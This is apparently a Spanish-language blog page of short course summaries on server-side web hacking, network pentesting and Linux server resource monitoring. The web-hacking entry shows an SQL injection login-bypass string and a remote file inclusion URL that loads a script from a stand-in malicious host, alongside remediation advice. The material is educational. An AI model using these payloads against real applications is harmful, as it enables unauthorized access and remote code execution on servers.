jueves, 26 de septiembre de 2024

Curso de Hacking: Aplicaciones Web Server Side

 

Curso de Hacking: Aplicaciones Web Server Side


Curso de Hacking Ético y Ciberseguridad para Principiantes - Free course

Objetivo: Explorar y comprender las técnicas de hacking enfocadas en vulnerabilidades del lado del servidor (Server-Side) en aplicaciones web, para identificar fallos de seguridad y proponer medidas correctivas.

Descripción:

El hacking de aplicaciones web server-side se centra en explotar vulnerabilidades en el servidor que gestiona la lógica de la aplicación. Los ataques más comunes incluyen inyección SQL, RFI (Remote File Inclusion) y deserialización insegura.

  1. Inyección SQL:

    • Un atacante inserta código SQL malicioso en un formulario de entrada para acceder a datos sensibles o modificar la base de datos.
    • Ejemplo: En una página de inicio de sesión, al ingresar ' OR '1'='1' -- en el campo de contraseña, el atacante puede eludir la autenticación.
  2. RFI (Remote File Inclusion):

    • Se aprovechan aplicaciones que permiten la inclusión de archivos de forma insegura, inyectando scripts maliciosos en el servidor.
    • Ejemplo: Al modificar la URL de la aplicación para incluir un archivo remoto, como http://example.com/index.php?page=http://malicioso.com/script.php, se ejecuta el archivo malicioso en el servidor.
  3. Deserialización insegura:

    • Un atacante manipula los datos serializados de una aplicación para ejecutar código arbitrario en el servidor.
    • Ejemplo: Al modificar un objeto serializado enviado al servidor, el hacker podría obtener acceso no autorizado o controlar el flujo de la aplicación.

Medidas Correctivas:

  • Usar consultas parametrizadas para prevenir la inyección SQL.
  • Implementar listas blancas de archivos permitidos para evitar RFI.
  • Asegurar la validación de datos deserializados.

Estas técnicas resaltan la importancia de asegurar los procesos server-side para prevenir accesos no autorizados y proteger los datos de los usuarios.

martes, 24 de septiembre de 2024

Curso de Pentesting a Redes


Pentesting a redes WiFi | FASE DE RECOLECCIÓN DE INFORMACIÓN ~ RedBird ...


Objetivo: Analizar y fortalecer la seguridad de una red mediante técnicas de Pentesting, simulando ataques para identificar vulnerabilidades.

Descripción:

El Pentesting o pruebas de penetración en redes evalúa la seguridad de una infraestructura. Los pasos clave incluyen reconocimiento, escaneo, explotación de vulnerabilidades y reportes. Se emplean herramientas como Nmap para el escaneo de puertos y Metasploit para la explotación de vulnerabilidades conocidas.

  1. Reconocimiento:

    • Se realiza un escaneo pasivo de la red para identificar direcciones IP y dispositivos conectados.
    • Herramientas: Nmap para detectar puertos abiertos y servicios corriendo.
  2. Escaneo de vulnerabilidades:

    • Usamos Nessus para identificar posibles fallos de seguridad en dispositivos y aplicaciones conectadas a la red.
    • Ejemplo: Se detecta que un servidor web expone una versión vulnerable de Apache.
  3. Explotación:

    • Mediante Metasploit, intentamos explotar las vulnerabilidades encontradas para acceder no autorizado, simulando ataques reales.
  4. Reporte:

    • Documentamos las vulnerabilidades descubiertas y sus riesgos, proponiendo soluciones como actualizaciones de software o configuraciones más seguras.

Este proceso ayuda a detectar fallos antes de que los atacantes reales lo hagan, mejorando la seguridad proactiva de la red.

sábado, 21 de septiembre de 2024

Administración de Servidores Linux: Manejo de Recursos

 Administración de Servidores Linux: Manejo de Recursos

Curso de Administración de Servidores Linux - Platzi

Objetivo: Implementar un sistema de monitoreo y optimización de recursos en un servidor Linux, garantizando un rendimiento estable y eficiente.

Descripción:

El proyecto se centra en gestionar de manera efectiva los recursos de un servidor Linux mediante el monitoreo de CPU, memoria y disco, con la automatización de respuestas a alertas de sobrecarga. Usaremos herramientas como htopiostat, y sar para obtener estadísticas en tiempo real.

  1. Monitoreo de CPU y memoria:

    • Usaremos el comando htop para visualizar los procesos activos y su consumo de CPU y memoria.
    • Ejemplo: Se detecta un proceso java que consume el 90% de la CPU. Implementamos un script que automáticamente reinicie el servicio cuando el uso supere el 80%.
  2. Monitoreo del uso de disco:

    • Utilizamos df -h y du para auditar el espacio en disco. En caso de que una partición supere el 85% de uso, se activa un script que elimina archivos temporales.
  3. Alertas y automatización:

    • Implementamos cron para ejecutar los scripts y configurar alertas con sendmail, notificando al administrador cuando se detecten situaciones críticas.

Ejemplo Real:

En un servidor de producción, se implementa el monitoreo de un proceso de bases de datos con htop, detectando picos de consumo de CPU que causaban lentitud en el servicio. Al automatizar el reinicio de este proceso, el tiempo de inactividad se redujo en un 30%.

Curso de Python

Hola, en el siguiente codigo podrás apreciar la opción de crear un archivo CSV e ingresar 'x' cantidad de datos a registar por país,...